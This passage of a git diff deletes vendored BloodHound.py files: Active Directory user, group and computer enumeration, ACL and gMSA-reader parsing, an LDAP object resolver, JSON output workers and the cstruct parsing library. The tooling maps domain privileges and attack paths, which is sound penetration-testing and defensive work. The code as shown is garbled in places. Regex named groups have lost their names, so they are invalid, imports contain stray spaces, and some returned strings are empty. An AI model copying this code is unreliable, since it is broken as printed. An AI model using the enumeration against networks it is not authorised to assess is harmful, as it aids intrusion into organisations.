group['Properties']['admincount'] = ADUtils.get_entry_property(entry, 'adminCount', default=0) == 1 - group['Properties']['description'] = ADUtils.get_entry_property(entry, 'description') - - for member in entry['attributes']['member']: - resolved_member = self.get_membership(member) - if resolved_member: - group['Members'].append(resolved_member) - - # If we are enumerating ACLs, we break out of the loop here - # this is because parsing ACLs is computationally heavy and therefor is done in subprocesses - if acl: - if self.disable_pooling: - # Debug mode, don't run this pooled since it hides exceptions - self.process_acldata(parse_binary_acl(group, 'group', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map)) - else: - # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file - self.aclenumerator.pool.apply_async(parse_binary_acl, args=(group, 'group', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata) - else: - # Write it to the queue -> write to file in separate thread - # this is solely for consistency with acl parsing, the performance improvement is probably minimal - self.result_q.put(group) - - self.write_default_groups() - - # If we are parsing ACLs, close the parsing pool first - # then close the result queue and join it - if acl and not self.disable_pooling: - self.aclenumerator.pool.close() - self.aclenumerator.pool.join() - self.result_q.put(None) - else: - self.result_q.put(None) - self.result_q.join() - - logging.debug('Finished writing groups') - - def enumerate_computers_dconly(self): - ''' - Enumerate computer objects. This function is only used if no - collection was requested that required connecting to computers anyway. - ''' - filename = 'computers.json' - - acl = 'acl' in self.collect - entries = self.addc.ad.computers - - logging.debug('Writing computers ACL to file: %s', filename) - - # Use a separate queue for processing the results - self.result_q = queue.Queue() - results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'computers', filename)) - results_worker.daemon = True - results_worker.start() - - if acl and not self.disable_pooling: - self.aclenumerator.init_pool() - - # This loops over the cached entries - for entry in entries: - if not 'attributes' in entry: - continue - - if 'dNSHostName' not in entry['attributes']: - continue - - hostname = entry['attributes']['dNSHostName'] - if not hostname: - continue - samname = entry['attributes']['sAMAccountName'] - - cobject = ADComputer(hostname=hostname, samname=samname, ad=self.addomain, addc=self.addc, objectsid=entry['attributes']['objectSid']) - cobject.primarygroup = MembershipEnumerator.get_primary_membership(entry) - computer = cobject.get_bloodhound_data(entry, self.collect, skip_acl=True) - - # If we are enumerating ACLs, we break out of the loop here - # this is because parsing ACLs is computationally heavy and therefor is done in subprocesses - if acl: - if self.disable_pooling: - # Debug mode, don't run this pooled since it hides exceptions - self.process_acldata(parse_binary_acl(computer, 'computer', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map)) - else: - # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file - self.aclenumerator.pool.apply_async(parse_binary_acl, args=(computer, 'computer', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata) - else: - # Write it to the queue -> write to file in separate thread - # this is solely for consistency with acl parsing, the performance improvement is probably minimal - self.result_q.put(computer) - - # If we are parsing ACLs, close the parsing pool first - # then close the result queue and join it - if acl and not self.disable_pooling: - self.aclenumerator.pool.close() - self.aclenumerator.pool.join() - self.result_q.put(None) - else: - self.result_q.put(None) - self.result_q.join() - - logging.debug('Finished writing computers') - - def parse_gmsa(self, user, entry): - """ - Parse GMSA DACL which states which users can read the password - """ - _, aces = parse_binary_acl(user, 'user', ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', raw=True), self.addc.objecttype_guid_map) - processed_aces = self.aceresolver.resolve_aces(aces) - for ace in processed_aces: - if ace['RightName'] == 'Owner': - continue - ace['RightName'] = 'ReadGMSAPassword' - user['Aces'].append(ace) - - def process_acldata(self, result): - """ - Process ACLs that resulted from parsing with cstruct - """ - data, aces = result - # Parse aces - data['Aces'] += self.aceresolver.resolve_aces(aces) - self.result_q.put(data) - - def write_default_groups(self): - """ - Put default groups in the groups.json file - """ - - # Domain controllers - rootdomain = self.addc.get_root_domain().upper() - entries = self.addc.get_domain_controllers() - - group = { - "ObjectIdentifier": "%s-S-1-5-9" % rootdomain, - "Properties": { - "domain": rootdomain.upper(), - "name": "ENTERPRISE DOMAIN CONTROLLERS@%s" % rootdomain, - }, - "Members": [], - "Aces": [] - } - for entry in entries: - resolved_entry = ADUtils.resolve_ad_entry(entry) - memberdata = { - "MemberId": resolved_entry['objectid'], - "MemberType": resolved_entry['type'].capitalize() - } - group["Members"].append(memberdata) - self.result_q.put(group) - - domainsid = self.addomain.domain_object.sid - domainname = self.addomain.domain.upper() - - # Everyone - evgroup = { - "ObjectIdentifier": "%s-S-1-1-0" % domainname, - "Properties": { - "domain": domainname, - "name": "EVERYONE@%s" % domainname, - }, - "Members": [ - { - "MemberId": "%s-515" % domainsid, - "MemberType": "Group" - }, - { - "MemberId": "%s-513" % domainsid, - "MemberType": "Group" - } - ], - "Aces": [] - } - self.result_q.put(evgroup) - - # Authenticated users - augroup = { - "ObjectIdentifier": "%s-S-1-5-11" % domainname, - "Properties": { - "domain": domainname, - "name": "AUTHENTICATED USERS@%s" % domainname, - }, - "Members": [ - { - "MemberId": "%s-515" % domainsid, - "MemberType": "Group" - }, - { - "MemberId": "%s-513" % domainsid, - "MemberType": "Group" - } - ], - "Aces": [] - } - self.result_q.put(augroup) - - - def enumerate_memberships(self): - """ - Run appropriate enumeration tasks - """ - self.enumerate_users() - self.enumerate_groups() - if not ('localadmin' in self.collect - or 'session' in self.collect - or 'loggedon' in self.collect - or 'experimental' in self.collect): - self.enumerate_computers_dconly() diff --git a/external/bloodhound/enumeration/objectresolver.py b/external/bloodhound/enumeration/objectresolver.py deleted file mode 100755 index b8535e3..0000000 --- a/external/bloodhound/enumeration/objectresolver.py +++ /dev/null @@ -1,151 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### -import logging -import threading -from ldap3.utils.conv import escape_filter_chars -from . .ad.utils import ADUtils - -class ObjectResolver(object): - """ - This class is responsible for resolving objects. This can be for example sAMAccountNames which - should be resolved in the GC to see which domain they belong to, or SIDs which have to be - resolved somewhere else. This resolver is thread-safe. - """ - def __init__(self, addomain, addc): - self.addomain = addomain - self.addc = addc - self.lock = threading.Lock() - - def resolve_distinguishedname(self, distinguishedname, use_gc=True): - """ - Resolve a DistinguishedName in LDAP. This will use the GC by default - Returns a single LDAP entry - """ - with self.lock: - if use_gc and not self.addc.gcldap: - if not self.addc.gc_connect(): - # Error connecting, bail - return None - if not use_gc and not self.addc.resolverldap: - if not self.addc.ldap_connect(resolver=True): - # Error connecting, bail - return None - if use_gc: - logging.debug('Querying GC for DN %s', distinguishedname) - else: - logging.debug('Querying resolver LDAP for DN %s', distinguishedname) - distinguishedname = self.addc.ldap_get_single(distinguishedname, use_gc=use_gc, use_resolver=True) - return distinguishedname - - def resolve_samname(self, samname, use_gc=True): - """ - Resolve a SAM name in the GC. This can give multiple results. - Returns a list of LDAP entries - """ - out = [] - safename = escape_filter_chars(samname) - with self.lock: - if not self.addc.gcldap: - if not self.addc.gc_connect(): - # Error connecting, bail - return None - if use_gc: - logging.debug('Querying GC for SAM Name %s', samname) - else: - logging.debug('Querying LDAP for SAM Name %s', samname) - entries = self.addc.search(search_base="", - search_filter='(sAMAccountName=%s)' % safename, - use_gc=use_gc, - attributes=['sAMAccountName', 'distinguishedName', 'sAMAccountType', 'objectSid']) - # This uses a generator, however we return a list - for entry in entries: - out.append(entry) - - return out - - def resolve_upn(self, upn): - """ - Resolve a UserPrincipalName in the GC. - Returns a single LDAP entry - """ - safename = escape_filter_chars(upn) - with self.lock: - if not self.addc.gcldap: - if not self.addc.gc_connect(): - # Error connecting, bail - return None - logging.debug('Querying GC for UPN %s', upn) - entries = self.addc.search(search_base="", - search_filter='(&(objectClass=user)(userPrincipalName=%s))' % safename, - use_gc=True, - attributes=['sAMAccountName', 'distinguishedName', 'sAMAccountType', 'objectSid']) - for entry in entries: - # By definition this can be only one entry - return entry - - def resolve_sid(self, sid, use_gc=True): - """ - Resolve a SID in LDAP. This will use the GC by default - Returns a single LDAP entry - """ - with self.lock: - if use_gc and not self.addc.gcldap: - if not self.addc.gc_connect(): - # Error connecting, bail - return None - if not use_gc and not self.addc.resolverldap: - if not self.addc.ldap_connect(resolver=True): - # Error connecting, bail - return None - if use_gc: - base = "" - logging.debug('Querying GC for SID %s', sid) - else: - logging.debug('Querying resolver LDAP for SID %s', sid) - base = None - entries = self.addc.search(search_base=base, - search_filter='(objectSid=%s)' % sid, - use_gc=use_gc, - use_resolver=True, - attributes=['sAMAccountName', 'distinguishedName', 'sAMAccountType']) - for entry in entries: - return entry - - def gc_sam_lookup(self, samname): - """ - This function attempts to resolve the SAM name returned in session enumeration to - a user/domain combination by querying the Global Catalog. - SharpHound calls this GC Deconflictation. - """ - output = [] - entries = self.resolve_samname(samname) - # If an error occurs, return - if entries is None: - return - if len(entries) > 0: - for entry in entries: - output.append(entry['attributes']['objectSid']) - else: - logging.warning('Failed to resolve SAM name %s in current forest', samname) - return output diff --git a/external/bloodhound/enumeration/outputworker.py b/external/bloodhound/enumeration/outputworker.py deleted file mode 100755 index 34ef92a..0000000 --- a/external/bloodhound/enumeration/outputworker.py +++ /dev/null @@ -1,110 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -import traceback -import codecs -import json - -class OutputWorker(object): - @staticmethod - def write_worker(result_q, computers_filename): - """ - Worker to write the results from the results_q to the given files. - """ - computers_out = codecs.open(computers_filename, 'w', 'utf-8') - - # If the logging level is DEBUG, we ident the objects - if logging.getLogger().getEffectiveLevel() == logging.DEBUG: - indent_level = 1 - else: - indent_level = None - - # Write start of the json file - computers_out.write('{"computers":[') - num_computers = 0 - while True: - obj = result_q.get() - - if obj is None: - logging.debug('Write worker obtained a None value, exiting') - break - - objtype, data = obj - if objtype == 'computer': - if num_computers != 0: - computers_out.write(',') - json.dump(data, computers_out, indent=indent_level) - num_computers += 1 - else: - logging.warning("Type is %s this should not happen", objtype) - - result_q.task_done() - - logging.debug('Write worker is done, closing files') - # Write metadata manually - computers_out.write('],"meta":{"type":"computers","count":%d, "version":3}}' % num_computers) - computers_out.close() - result_q.task_done() - - @staticmethod - def membership_write_worker(result_q, enumtype, filename): - """ - Worker to write the results from the results_q to the given file. - This is for both users and groups - """ - try: - membership_out = codecs.open(filename, 'w', 'utf-8') - except: - logging.warning('Could not write file: %s', filename) - result_q.task_done() - return - - # If the logging level is DEBUG, we ident the objects - if logging.getLogger().getEffectiveLevel() == logging.DEBUG: - indent_level = 1 - else: - indent_level = None - - # Write start of the json file - membership_out.write('{"%s":[' % enumtype) - num_members = 0 - while True: - data = result_q.get() - - if data is None: - break - - if num_members != 0: - membership_out.write(',') - json.dump(data, membership_out, indent=indent_level) - num_members += 1 - - result_q.task_done() - - logging.info('Found %d %s', num_members, enumtype) - # Write metadata manually - membership_out.write('],"meta":{"type":"%s","count":%d, "version":3}}' % (enumtype, num_members)) - membership_out.close() - result_q.task_done() diff --git a/external/bloodhound/lib/__init__.py b/external/bloodhound/lib/__init__.py deleted file mode 100755 index 930acf9..0000000 --- a/external/bloodhound/lib/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -from . .lib.cstruct import ( - cstruct, - ctypes, - dumpstruct, - hexdump, - Instance, - PointerInstance, - Parser, - RawType, - BaseType, - Error, - ParserError, - CompilerError, - ResolveError, - NullPointerDereference, -) - -__all__ = [ - "cstruct", - "ctypes", - "dumpstruct", - "hexdump", - "Instance", - "PointerInstance", - "Parser", - "RawType", - "BaseType", - "Error", - "ParserError", - "CompilerError", - "ResolveError", - "NullPointerDereference", -] diff --git a/external/bloodhound/lib/cstruct.py b/external/bloodhound/lib/cstruct.py deleted file mode 100755 index 3314e40..0000000 --- a/external/bloodhound/lib/cstruct.py +++ /dev/null @@ -1,1894 +0,0 @@ -# Copyright (c) 2018 Fox-IT Security Research Team -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. - -# TODO: -# - Rework definition parsing, maybe pycparser? -# - Change expression implementation -# - Lazy reading? -from __future__ import print_function -import re -import sys -import ast -import pprint -import string -import struct -import ctypes as _ctypes -from io import BytesIO -from collections import OrderedDict - -try: - from builtins import bytes as newbytes -except ImportError: - newbytes = bytes - -PY3 = sys.version_info > (3,) -if PY3: - long = int - xrange = range - -DEBUG = False - -COLOR_RED = '\033[1;31m' -COLOR_GREEN = '\033[1;32m' -COLOR_YELLOW = '\033[1;33m' -COLOR_BLUE = '\033[1;34m' -COLOR_PURPLE = '\033[1;35m' -COLOR_CYAN = '\033[1;36m' -COLOR_WHITE = '\033[1;37m' -COLOR_NORMAL = '\033[1;0m' - -COLOR_BG_RED = '\033[1;41m\033[1;37m' -COLOR_BG_GREEN = '\033[1;42m\033[1;37m' -COLOR_BG_YELLOW = '\033[1;43m\033[1;37m' -COLOR_BG_BLUE = '\033[1;44m\033[1;37m' -COLOR_BG_PURPLE = '\033[1;45m\033[1;37m' -COLOR_BG_CYAN = '\033[1;46m\033[1;37m' -COLOR_BG_WHITE = '\033[1;47m\033[1;30m' - -PRINTABLE = string.digits + string.ascii_letters + string.punctuation + " " - -COMPILE_TEMPL = """ -class {name}(Structure): - def __init__(self, cstruct, structure, source=None): - self.structure = structure - self.source = source - super({name}, self).__init__(cstruct, structure.name, structure.fields) - - def _read(self, stream): - r = OrderedDict() - sizes = {{}} - bitreader = BitBuffer(stream, self.cstruct.endian) - -{read_code} - - return Instance(self, r, sizes) - - def add_fields(self, name, type_, offset=None): - raise NotImplementedError("Can't add fields to a compiled structure") - - def __repr__(self): - return '' -""" - - -class Error(Exception): - pass - - -class ParserError(Error): - pass - - -class CompilerError(Error): - pass - - -class ResolveError(Error): - pass - - -class NullPointerDereference(Error): - pass - - -def log(line, *args, **kwargs): - if not DEBUG: - return - - print(line.format(*args, **kwargs), file=sys.stderr) - - -class cstruct(object): - """Main class of cstruct. All types are registered in here. - - Args: - endian: The endianness to use when parsing. - pointer: The pointer type to use for Pointers. - """ - - DEF_CSTYLE = 1 - - def __init__(self, endian='<', pointer='uint64'): - self.endian = endian - - self.consts = {} - self.lookups = {} - self.typedefs = { - 'byte': 'int8', - 'ubyte': 'uint8', - 'uchar': 'uint8', - 'short': 'int16', - 'ushort': 'uint16', - 'long': 'int32', - 'ulong': 'uint32', - 'ulong64': 'uint64', - - 'u1': 'uint8', - 'u2': 'uint16', - 'u4': 'uint32', - 'u8': 'uint64', - - 'word': 'uint16', - 'dword': 'uint32', - - 'longlong': 'int64', - 'ulonglong': 'uint64', - - 'int': 'int32', - 'unsigned int': 'uint32', - - 'int8': PackedType(self, 'int8', 1, 'b'), - 'uint8': PackedType(self, 'uint8', 1, 'B'), - 'int16': PackedType(self, 'int16', 2, 'h'), - 'uint16': PackedType(self, 'uint16', 2, 'H'), - 'int32': PackedType(self, 'int32', 4, 'i'), - 'uint32': PackedType(self, 'uint32', 4, 'I'), - 'int64': PackedType(self, 'int64', 8, 'q'), - 'uint64': PackedType(self, 'uint64', 8, 'Q'), - 'float': PackedType(self, 'float', 4, 'f'), - 'double': PackedType(self, 'double', 8, 'd'), - 'char': CharType(self), - 'wchar': WcharType(self), - - 'int24': BytesInteger(self, 'int24', 3, True), - 'uint24': BytesInteger(self, 'uint24', 3, False), - 'int48': BytesInteger(self, 'int48', 6, True), - 'uint48': BytesInteger(self, 'uint48', 6, False), - - 'void': VoidType(), - } - - self.pointer = self.resolve(pointer) - - def addtype(self, name, t, replace=False): - """Add a type or type reference. - - Args: - name: Name of the type to be added. - t: The type to be added. Can be a str reference to another type - or a compatible type class. - - Raises: - ValueError: If the type already exists. - """ - name = name.lower() - if not replace and name.lower() in self.typedefs: - raise ValueError("Duplicate type: %s" % name) - - self.typedefs[name] = t - - def load(self, s, deftype=None, **kwargs): - """Parse structures from the given definitions using the given definition type. - - Definitions can be parsed using different parsers. Currently, there's - only one supported parser - DEF_CSTYLE. Parsers can add types and - modify this cstruct instance. Arguments can be passed to parsers - using kwargs. - - Args: - s: The definition to parse. - deftype: The definition type to parse the definitions with. - **kwargs: Keyword arguments for parsers. - """ - deftype = deftype or cstruct.DEF_CSTYLE - - if deftype == cstruct.DEF_CSTYLE: - parser = CStyleParser(self, **kwargs) - - parser.parse(s) - - def loadfile(self, s, deftype=None, **kwargs): - """Load structure definitions from a file. - - The given path will be read and parsed using the .load() function. - - Args: - s: The path to load definitions from. - deftype: The definition type to parse the definitions with. - **kwargs: Keyword arguments for parsers. - """ - with open(s, 'r') as fh: - self.load(fh.read(), deftype, **kwargs) - - def read(self, name, s): - """Parse data using a given type. - - Args: - name: Type name to read. - s: File-like object or byte string to parse. - - Returns: - The parsed data. - """ - return self.resolve(name).read(s) - - def resolve(self, name): - """Resolve a type name to get the actual type object. - - Types can be referenced using different names. When we want - the actual type object, we need to resolve these references. - - Args: - name: Type name to resolve. - - Returns: - The resolved type object. - - Raises: - ResolveError: If the type can't be resolved. - """ - t = name - if not isinstance(t, str): - return t - - for i in xrange(10): - if t.lower() not in self.typedefs: - raise ResolveError("Unknown type %s" % name) - - t = self.typedefs[t.lower()] - - if not isinstance(t, str): - return t - - raise ResolveError("Recursion limit exceeded while resolving type %s" % name) - - def __getattr__(self, attr): - if attr.lower() in self.typedefs: - return self.typedefs[attr.lower()] - - if attr in self.consts: - return self.consts[attr] - - raise AttributeError("Invalid Attribute: %s" % attr) - - -class Parser(object): - """Base class for definition parsers. - - Args: - cstruct: An instance of cstruct. - """ - - def __init__(self, cstruct): - self.cstruct = cstruct - - def parse(self, data): - """This function should parse definitions to cstruct types. - - Args: - data: Data to parse definitions from, usually a string. - """ - raise NotImplementedError() - - -class CStyleParser(Parser): - """Definition parser for C-like structure syntax. - - Args: - cstruct: An instance of cstruct - compiled: Whether structs should be compiled or not. - """ - - def __init__(self, cstruct, compiled=True): - self.compiled = compiled - super(CStyleParser, self).__init__(cstruct) - - # TODO: Implement proper parsing - def parse(self, data): - self._constants(data) - self._enums(data) - self._structs(data) - self._lookups(data, self.cstruct.consts) - - def _constants(self, data): - r = re.finditer(r'#define\s+(?P[^\s]+)\s+(?P[^\r\n]+)\s*\n', data) - for t in r: - d = t.groupdict() - v = d['value'].rsplit('//')[0] - - try: - v = ast.literal_eval(v) - except (ValueError, SyntaxError): - pass - - self.cstruct.consts[d['name']] = v - - def _enums(self, data): - r = re.finditer( - r'enum\s+(?P[^\s:{]+)\s*(:\s*(?P[^\s]+)\s*)?\{(?P[^}]+)\}\s*;', - data, - ) - for t in r: - d = t.groupdict() - - nextval = 0 - values = {} - for line in d['values'].split('\n'): - line, sep, comment = line.partition("//") - for v in line.split(","): - key, sep, val = v.partition("=") - key = key.strip() - val = val.strip() - if not key: - continue - if not val: - val = nextval - else: - val = Expression(self.cstruct, val).evaluate({}) - - nextval = val + 1 - - values[key] = val - - if not d['type']: - d['type'] = 'uint32' - - enum = Enum( - self.cstruct, d['name'], self.cstruct.resolve(d['type']), values - ) - self.cstruct.addtype(enum.name, enum) - - def _structs(self, data): - compiler = Compiler(self.cstruct) - r = re.finditer( - r'(#(?P(?:compile))\s+)?((?Ptypedef)\s+)?(?P[^\s]+)\s+(?P[^\s]+)?(?P\s*\{[^}]+\}(?P\s+[^;\n]+)?)?\s*;', - data, - ) - for t in r: - d = t.groupdict() - - if d['name']: - name = d['name'] - elif d['defs']: - name = d['defs'].strip().split(',')[0].strip() - else: - raise ParserError("No name for struct") - - if d['type'] == 'struct': - data = self._parse_fields(d['fields'][1:-1].strip()) - st = Structure(self.cstruct, name, data) - if d['flags'] == 'compile' or self.compiled: - st = compiler.compile(st) - elif d['typedef'] == 'typedef': - st = d['type'] - else: - continue - - if d['name']: - self.cstruct.addtype(d['name'], st) - - if d['defs']: - for td in d['defs'].strip().split(','): - td = td.strip() - self.cstruct.addtype(td, st) - - def _parse_fields(self, s): - fields = re.finditer( - r'(?P[^\s]+)\s+(?P[^\s\[:]+)(\s*:\s*(?P\d+))?(\[(?P[^;\n]*)\])?;', - s, - ) - r = [] - for f in fields: - d = f.groupdict() - if d['type'].startswith('//'): - continue - - type_ = self.cstruct.resolve(d['type']) - - d['name'] = d['name'].replace('(', '').replace(')', '') - - # Maybe reimplement lazy type references later - # _type = TypeReference(self, d['type']) - if d['count'] is not None: - if d['count'] == '': - count = None - else: - count = Expression(self.cstruct, d['count']) - try: - count = count.evaluate() - except Exception: - pass - - type_ = Array(self.cstruct, type_, count) - - if d['name'].startswith('*'): - d['name'] = d['name'][1:] - type_ = Pointer(self.cstruct, type_) - - field = Field(d['name'], type_, int(d['bits']) if d['bits'] else None) - r.append(field) - - return r - - def _lookups(self, data, consts): - r = re.finditer(r'\$(?P[^\s]+) = ({[^}]+})\w*\n', data) - - for t in r: - d = ast.literal_eval(t.group(2)) - self.cstruct.lookups[t.group(1)] = dict( - [(self.cstruct.consts[k], v) for k, v in d.items()] - ) - - -class Instance(object): - """Holds parsed structure data.""" - - def __init__(self, type_, values, sizes=None): - object.__setattr__(self, '_type', type_) - object.__setattr__(self, '_values', values) - object.__setattr__(self, '_sizes', sizes) - - def write(self, fh): - """Write this structure to a writable file-like object. - - Args: - fh: File-like objects that supports writing. - - Returns: - The amount of bytes written. - """ - return self.__dict__['_type'].write(fh, self) - - def dumps(self): - """Dump this structure to a byte string. - - Returns: - The raw bytes of this structure. - """ - s = BytesIO() - self.write(s) - return s.getvalue() - - def __getattr__(self, attr): - if attr not in self.__dict__['_type'].lookup: - raise AttributeError("Invalid attribute: %r" % attr) - - return self.__dict__['_values'][attr] - - def __setattr__(self, attr, value): - if attr not in self.__dict__['_type'].lookup: - raise AttributeError("Invalid attribute: %r" % attr) - - self.__dict__['_values'][attr] = value - - def __getitem__(self, item): - return self.__dict__['_values'][item] - - def __contains__(self, attr): - return attr in self.__dict__['_values'] - - def __repr__(self): - return '<%s %s>' % ( - self.__dict__['_type'].name, - ', '.join( - [ - '%s=%s' % (k, hex(v) if isinstance(v, (int, long)) else repr(v)) - for k, v in self.__dict__['_values'].items() - ] - ), - ) - - def __len__(self): - return len(self.dumps()) - - def _size(self, field): - return self.__dict__['_sizes'][field] - - -class PointerInstance(object): - """Like the Instance class, but for structures referenced by a pointer.""" - - def __init__(self, t, stream, addr, ctx): - self._stream = stream - self._type = t - self._addr = addr - self._ctx = ctx - self._value = None - - def _get(self): - log("Dereferencing pointer -> 0x{:016x} [{!r}]", self._addr, self._stream) - if self._addr == 0: - raise NullPointerDereference() - - if self._value is None: - pos = self._stream.tell() - self._stream.seek(self._addr) - if isinstance(self._type, Array): - r = self._type._read(self._stream, self._ctx) - else: - r = self._type._read(self._stream) - self._stream.seek(pos) - self._value = r - - return self._value - - def __getattr__(self, attr): - return getattr(self._get(), attr) - - def __str__(self): - return str(self._get()) - - def __nonzero__(self): - return self._addr != 0 - - def __repr__(self): - return "".format(self._type, self._addr) - - -class Expression(object): - """Expression parser for simple calculations in definitions.""" - - operators = [ - ('+', lambda a, b: a + b), - ('-', lambda a, b: a - b), - ('*', lambda a, b: a * b), - ('/', lambda a, b: a / b), - ('&', lambda a, b: a & b), - ('|', lambda a, b: a | b), - ('>>', lambda a, b: a >> b), - ('<<', lambda a, b: a << b), - ] - - def __init__(self, cstruct, expr): - self.cstruct = cstruct - self.expr = expr - - def evaluate(self, context=None): - context = context if context else {} - level = 0 - levels = [] - buf = '' - - for i in xrange(len(self.expr)): - if self.expr[i] == '(': - level += 1 - levels.append(buf) - buf = '' - continue - - if self.expr[i] == ')': - level -= 1 - val = self.evaluate_part(buf, context) - buf = levels.pop() - buf += str(val) - continue - - buf += self.expr[i] - - return self.evaluate_part(buf, context) - - def evaluate_part(self, e, v): - e = e.strip() - - for o in self.operators: - if o[0] in e: - a, b = e.rsplit(o[0], 1) - return o[1](self.evaluate_part(a, v), self.evaluate_part(b, v)) - - if e in v: - return v[e] - - if e.startswith('0x'): - return int(e, 16) - - if e in self.cstruct.consts: - return self.cstruct.consts[e] - - return int(e) - - def __repr__(self): - return self.expr - - -class BaseType(object): - """Base class for cstruct type classes.""" - - def __init__(self, cstruct): - self.cstruct = cstruct - - def reads(self, data): - """Parse the given data according to the type that implements this class. - - Args: - data: Byte string to parse. - - Returns: - The parsed value of this type. - """ - data = BytesIO(data) - return self._read(data) - - def dumps(self, data): - """Dump the given data according to the type that implements this class. - - Args: - data: Data to dump. - - Returns: - The resulting bytes. - """ - out = BytesIO() - self._write(out, data) - return out.getvalue() - - def read(self, obj, *args, **kwargs): - """Parse the given data according to the type that implements this class. - - Args: - obj: Data to parse. Can be a (byte) string or a file-like object. - - Returns: - The parsed value of this type. - """ - if isinstance(obj, (str, bytes, newbytes)): - return self.reads(obj) - - return self._read(obj) - - def write(self, stream, data): - """Write the given data to a writable file-like object according to the - type that implements this class. - - Args: - stream: Writable file-like object to write to. - data: Data to write. - - Returns: - The amount of bytes written. - """ - return self._write(stream, data) - - def _read(self, stream): - raise NotImplementedError() - - def _read_array(self, stream, count): - return [self._read(stream) for i in xrange(count)] - - def _read_0(self, stream): - raise NotImplementedError() - - def _write(self, stream, data): - raise NotImplementedError() - - def _write_array(self, stream, data): - num = 0 - for i in data: - num += self._write(stream, i) - return num - - def _write_0(self, stream, data): - raise NotImplementedError() - - def default(self): - """Return a default value of this type.""" - raise NotImplementedError() - - def default_array(self): - """Return a default array of this type.""" - raise NotImplementedError() - - def __getitem__(self, count): - return Array(self.cstruct, self, count) - - def __call__(self, *args, **kwargs): - if len(args) > 0: - return self.read(*args, **kwargs) - - r = self.default() - if kwargs: - for k, v in kwargs.items(): - setattr(r, k, v) - - return r - - -class RawType(BaseType): - """Base class for raw types that have a name and size.""" - - def __init__(self, cstruct, name=None, size=0): - self.name = name - self.size = size - super(RawType, self).__init__(cstruct) - - def __len__(self): - return self.size - - def __repr__(self): - if self.name: - return self.name - - return BaseType.__repr__(self) - - -class Structure(BaseType): - """Type class for structures.""" - - def __init__(self, cstruct, name, fields=None): - self.name = name - self.size = None - self.lookup = OrderedDict() - self.fields = fields if fields else [] - - for f in self.fields: - self.lookup[f.name] = f - - self._calc_offsets() - super(Structure, self).__init__(cstruct) - - def _calc_offsets(self): - offset = 0 - bitstype = None - bitsremaining = 0 - - for field in self.fields: - if field.bits: - if bitsremaining == 0 or field.type != bitstype: - bitstype = field.type - bitsremaining = bitstype.size * 8 - if offset is not None: - field.offset = offset - offset += bitstype.size - else: - field.offset = None - - bitsremaining -= field.bits - continue - - field.offset = offset - if offset is not None: - try: - offset += len(field.type) - except TypeError: - offset = None - - def _calc_size(self): - size = 0 - bitstype = None - bitsremaining = 0 - - for field in self.fields: - if field.bits: - if bitsremaining == 0 or field.type != bitstype: - bitstype = field.type - bitsremaining = bitstype.size * 8 - size += bitstype.size - - bitsremaining -= field.bits - continue - - fieldlen = len(field.type) - size += fieldlen - - if field.offset is not None: - size = max(size, field.offset + fieldlen) - 